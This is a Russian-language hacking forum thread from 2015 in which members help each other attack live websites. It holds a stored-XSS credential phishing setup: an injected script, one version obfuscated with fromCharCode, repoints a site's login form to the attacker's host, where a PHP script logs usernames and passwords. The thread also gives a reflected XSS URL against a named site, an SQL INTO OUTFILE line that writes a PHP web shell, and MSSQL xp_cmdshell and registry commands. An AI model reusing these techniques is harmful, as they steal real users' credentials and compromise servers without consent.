Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Попробуйте так. Может там нормализатор ссылок обрезает http://
    Code:
    <script>String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 108, 115, 102, 111, 114, 109, 39, 41, 46, 97, 99, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 1052, 1086, 1081, 1061, 1086, 1089, 1090, 1080, 1085, 1075, 49, 46, 114, 117, 47, 98, 97, 115, 101, 46, 112, 104, 112, 63, 34, 59);</script>
    
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    потому что так работает action. добавьте редирект обратно на форум в вашем base.php
     
    _________________________
  3. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Редирект не помагает,вот как происходит;мой хостинг где лежит base.php "МойХостинг.ru/base.php" их сайт "УязвимыйСайт.ru/forum/forum.php" когда нажимаю ВХОД то ничего не происходит,даже в профиль не заходит,смотрю через чарльз что происходит там,и вижу что вместо "МойХостинг.ru/base.php" становится так" УязвимыйСайт.ru/base.php" и в пакете есть логин и пас,но ничего не происходит(((

    вот сам base.php
    ----------------------------------------------------------------
    <?
    $login = $_POST['username'];
    $pass = $_POST['password'];
    $file = "log.txt";
    $fop = fopen("$file","a+");
    fwrite($fop,"$login;$pass\n");
    fclose($fop);
    header('Location: http://УязвимыйСайт/forum/forum.php');
    ?>
    -------------------------------------------------------------------
    Я сначала ввожу скрипт вместо ника <script src="http://МойСайт.ru/1.js"></script> а в 1.js лежит document.getElementById('lsform').action="http://МойСайт.ru/base.php?";
    --------------------------------------------------------------------
     
    #423 djon, 4 Aug 2015
    Last edited: 4 Aug 2015
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Скрипт, скорее всего, нужно выполнять в document onload. Возможно на странице есть ещё какие-то скрипты.

    Правильнее было бы сделать скрипт для события onsubmit, который без двойных заметных редиректов отправлял данные к нам на хост. Если XSS не в login.php, пишут скрипты, которые остаются на странице даже после того, как юзер её покинет переходом по ссылке на другую.
     
  5. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    <form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes" onsubmit="return lsSubmit();">

    Я для этой формы скрипт подключаю,есть еще js на их сайте,выглядит так

    <div class="hdc cl"><script src="logging.js?crR" type="text/javascript"></script>

    А в нем вот это
    Code:
    function lsSubmit(op) {
        var op = !op ? 0 : op;
        if(op) {
            $('lsform').cookietime.value = 2592000;
        }
        if($('ls_username').value == '' || $('ls_password').value == '') {
            showWindow('login', 'member.php?mod=logging&action=login' + (op ? '&cookietime=1' : ''));
        } else {
            ajaxpost('lsform', 'return_ls', 'return_ls');
        }
        return false;
    }
    
    function errorhandle_ls(str, param) {
        if(!param['type']) {
            showError(str);
        }
    }
    Еще к сылке добавляется inajax, вот так /base.php?&inajax
    И уязвимость Активная,и находится где форма авторизации
     
    #425 djon, 5 Aug 2015
    Last edited: 5 Aug 2015
  6. GusTor

    GusTor New Member

    Joined:
    5 Aug 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Ну там же написано.

    Code:
    http://www.rostof.ru/article.php?chapter=&id="><script>alert()</script>
     
    _________________________
  8. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Вот он - корень всех зол.
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Здравствуйте. заранее простите за не корректную формулировку вопроса. Имею sql инъекцию, права рут, ОС виндус, как выполнить команду cmd?
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Заливаите шелл и если нужные функции в пхп не отключены то через консоль выполняите нужные вам команды
     
    _________________________
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    шел залить можно. Но мне интересно именно это. как через sqlmap делать я более мение знаю, а вот как ручками не знаю вообще. Надо привыкать в полевым условиям, когда только я и сайт, а между нами браузер.
     
  12. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    SELECT '<?php echo shell_exec($_GET["cmd"]);?>' INTO OUTFILE 'var/www/site.com/shell.php';--
     
    _________________________
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    это запись. а мне именно выполнение cmd команды надо. Ладно , сделаю выложу то что мне надо было, не могу объяснить ))
     
  14. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Да мне кажется что проблема даже не в "onsubmit="return lsSubmit();"

    Пробую сделать даже так для чекбокса,что бы удалить disabled="disabled

    <input type="checkbox" name="htmlon" id="htmlon" class="pc" value="0" disabled="disabled">

    <script>document.getElementById ('htmlon').removeAttribute ('disabled');</script>

    И тоже не выходит cсылка делается такой /forum/h%3C/a%3E%3C/li%3E%3Cli%20title=

    Я вот что еще нашел на странице

    <img src="static/image/common/online_home.gif" alt="icon" />
    <a href="home.php?mod=space&amp;uid=23180">8<script src="h</a>
    </li>
    <li title="Время: 11:05">
    -------------------------------------------------------------------
    <img src="static/image/common/online_home.gif" alt="icon" />
    <a href="home.php?mod=space&amp;uid=22137">Крест</a>
    </li>
    <li title="Время: 11:05">
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    sqlmap так и делает. льет файл с system() или другими и к ним уже обращается, как к шеллу, парся вывод. в postgresql 9.3 и mssql есть функция выполнения системных команд. это то, о чем вы говорите? какая dbms? mssql?
     
    _________________________
  16. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Выполнение команд (mysql) - либо через сторонний интерпретатор (php), либо через эксплоит, либо этим способом (для SQL-инъекций не подойдет): https://forum.antichat.net/threads/324318/
     
  17. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Вот, это я имел в виду.
    http://www.sqlinjectionwiki.com/Cat...eat-sheet/#Enablingxp_cmdshellinSQLServer2005
    Code:
    XEC master.dbo.xp_cmdshell "cmd.exe реж C: '
    а про вот это я забыл, что такое тоже можно
    Code:
    xp_regaddmultistring
    xp_regdeletekey
    xp_regdeletevalue
    xp_regenumkeys
    xp_regenumvalues
    xp_regread
    xp_regremovemultistring
    xp_regwrite
    Exec xp_regread HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Параметры", "nullsessionshares"
    Exec xp_regenumvalues HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ SNMP \ Параметры \ validcommunitie
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    т. е. нужно было просто с самого начала сказать, что у вас mssql.
    https://rdot.org/forum/showthread.php?t=826 читать абзац "выполнение команд"
     
    _________________________
    BabaDook likes this.
  19. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Незачем фишинг ,левые сервера и уж темболее си.Если сторед xss на тойже страничке что и форма авторизации то все легко перехватывается. Нужен будет сниффер лишь чтобы заместо куков ловить логины и пароли. По реализации подсказать в лс могу
     
  20. djon

    djon New Member

    Joined:
    6 Jul 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Нашел такое www.site.ru/api.php?appId=APP324233456&cb=&[email protected]&pwd=123123&fn=1
    это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"[email protected]","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"}) в параметре cb= можно прописать любой html код,например (<input name="txt_email20" type="text" class="input_login">) то он исполнится ,и будет выглядеть так

    тут будет форма
    ({"email":"[email protected]","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"})

    И ява скрипты не исполняются почему то.

    Что можно с этим сделать?
     
    #440 djon, 10 Aug 2015
    Last edited: 10 Aug 2015